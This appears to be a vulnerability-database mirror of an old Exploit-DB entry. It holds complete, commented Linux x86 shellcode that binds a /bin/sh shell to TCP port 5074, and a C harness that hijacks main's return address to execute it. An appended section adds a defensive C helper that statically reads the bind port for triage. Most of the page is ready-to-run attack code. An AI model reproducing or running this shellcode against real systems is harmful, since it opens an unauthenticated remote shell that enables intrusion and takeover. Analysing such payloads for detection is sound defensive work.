Linux/x86 – Bind (5074/TCP) Shell Shellcode (92 bytes)


Vulnerability ID: 1054607
Vulnerability type:
Published: 2004-09-12
Updated: 2004-09-12
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux_x86
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/13448
|Vulnerability details
Vulnerability details have not been disclosed.
|Exploit
/* 
 * [email protected]
 * x86 portbind a shell in port 5074
 * 92 bytes.
 *
 */

#include <stdio.h>
#include <string.h>

char shellcode[] =
// socketcall #1 (%ebx = 1): socket
"\x31\xc0"			// xorl		%eax,%eax
"\x50"				// pushl	%eax
"\x40"				// incl		%eax
"\x89\xc3"			// movl		%eax,%ebx
"\x50"				// pushl	%eax
"\x40"				// incl		%eax
"\x50"				// pushl	%eax
"\x89\xe1"			// movl		%esp,%ecx
"\xb0\x66"			// movb		$0x66,%al
"\xcd\x80"			// int		$0x80
// socketcall #2 (%ebx = 2): bind; bytes 13 d2 are port 5074 in network order
"\x31\xd2"			// xorl		%edx,%edx
"\x52"				// pushl	%edx
"\x66\x68\x13\xd2"		// pushw	$0xd213
"\x43"				// incl		%ebx
"\x66\x53"			// pushw	%bx
"\x89\xe1"			// movl		%esp,%ecx
"\x6a\x10"			// pushl	$0x10
"\x51"				// pushl	%ecx
"\x50"				// pushl	%eax
"\x89\xe1"			// movl		%esp,%ecx
"\xb0\x66"			// movb		$0x66,%al
"\xcd\x80"			// int		$0x80
// socketcall #4 (%ebx = 4): listen
"\x40"				// incl		%eax
"\x89\x44\x24\x04"		// movl		%eax,0x4(%esp,1)
"\x43"				// incl		%ebx
"\x43"				// incl		%ebx
"\xb0\x66"			// movb		$0x66,%al
"\xcd\x80"			// int		$0x80
// socketcall #5 (%ebx = 5): accept
"\x83\xc4\x0c"			// addl		$0xc,%esp
"\x52"				// pushl	%edx
"\x52"				// pushl	%edx
"\x43"				// incl		%ebx
"\xb0\x66"			// movb		$0x66,%al
"\xcd\x80"			// int		$0x80
// dup2 (syscall 0x3f) loop over descriptors 0, 1, 2
"\x93"				// xchgl	%eax,%ebx
"\x89\xd1"			// movl		%edx,%ecx
"\xb0\x3f"			// movb		$0x3f,%al
"\xcd\x80"			// int		$0x80
"\x41"				// incl		%ecx
"\x80\xf9\x03"			// cmpb		$0x3,%cl
"\x75\xf6"			// jnz		<shellcode+0x40>
// execve (syscall 0x0b) of "//bin/sh"
"\x52"				// pushl	%edx
"\x68\x6e\x2f\x73\x68"		// pushl	$0x68732f6e
"\x68\x2f\x2f\x62\x69"		// pushl	$0x69622f2f
"\x89\xe3"			// movl		%esp,%ebx
"\x52"				// pushl	%edx
"\x53"				// pushl	%ebx
"\x89\xe1"			// movl		%esp,%ecx
"\xb0\x0b"			// movb		$0xb,%al
"\xcd\x80"			// int		$0x80
;

int main() {
        int *ret;
        // Point ret at main's saved return address (32-bit x86 stack layout)
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%d\n",(int)strlen(shellcode));
        // Overwrite it so that returning from main jumps to the byte array
        (*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-12]
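
For triage, the listening port can be read statically from the `pushw $0xd213` / `pushw %bx` pair that builds the `sockaddr_in` in the listing above. The following is an added example, not part of the original listing: `find_bind_port` and `has_seq` are hypothetical helper names, and the 4-byte and 20-byte search windows are assumptions chosen to fit this listing's layout.

```c
#include <stddef.h>
#include <stdio.h>

/* Sample input: only the sockaddr_in setup and bind() socketcall bytes
 * from the listing above. Not a complete payload. */
static const unsigned char sample[] = {
    0x31, 0xd2, 0x52, 0x66, 0x68, 0x13, 0xd2, 0x43, 0x66, 0x53, 0x89,
    0xe1, 0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0xb0, 0x66, 0xcd, 0x80
};

/* Return 1 if pat[0..plen) occurs in buf[from..to), with to clamped to len. */
static int has_seq(const unsigned char *buf, size_t len, size_t from,
                   size_t to, const unsigned char *pat, size_t plen)
{
    if (to > len) to = len;
    for (size_t i = from; i + plen <= to; i++) {
        size_t j = 0;
        while (j < plen && buf[i + j] == pat[j]) j++;
        if (j == plen) return 1;
    }
    return 0;
}

/* Hypothetical triage helper: look for `pushw imm16` (66 68 hi lo)
 * followed closely by `pushw %bx` (66 53, the sin_family word) and then
 * a socketcall (b0 66 cd 80). Returns the TCP port in host order, or -1
 * when the pattern is absent. */
int find_bind_port(const unsigned char *buf, size_t len)
{
    static const unsigned char push_bx[] = { 0x66, 0x53 };
    static const unsigned char sockcall[] = { 0xb0, 0x66, 0xcd, 0x80 };

    for (size_t i = 0; i + 4 <= len; i++) {
        if (buf[i] != 0x66 || buf[i + 1] != 0x68) continue;
        /* The two immediate bytes land on the stack in this order,
         * which is the network (big-endian) order of sin_port. */
        int port = (buf[i + 2] << 8) | buf[i + 3];
        if (has_seq(buf, len, i + 4, i + 8, push_bx, 2) &&
            has_seq(buf, len, i + 4, i + 24, sockcall, 4))
            return port;
    }
    return -1;
}

int main(void)
{
    printf("bind port: %d\n", find_bind_port(sample, sizeof sample));
    return 0;
}
```

The heuristic matches this specific instruction encoding only; a variant that loads the port through a register or a different push form needs its own pattern.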
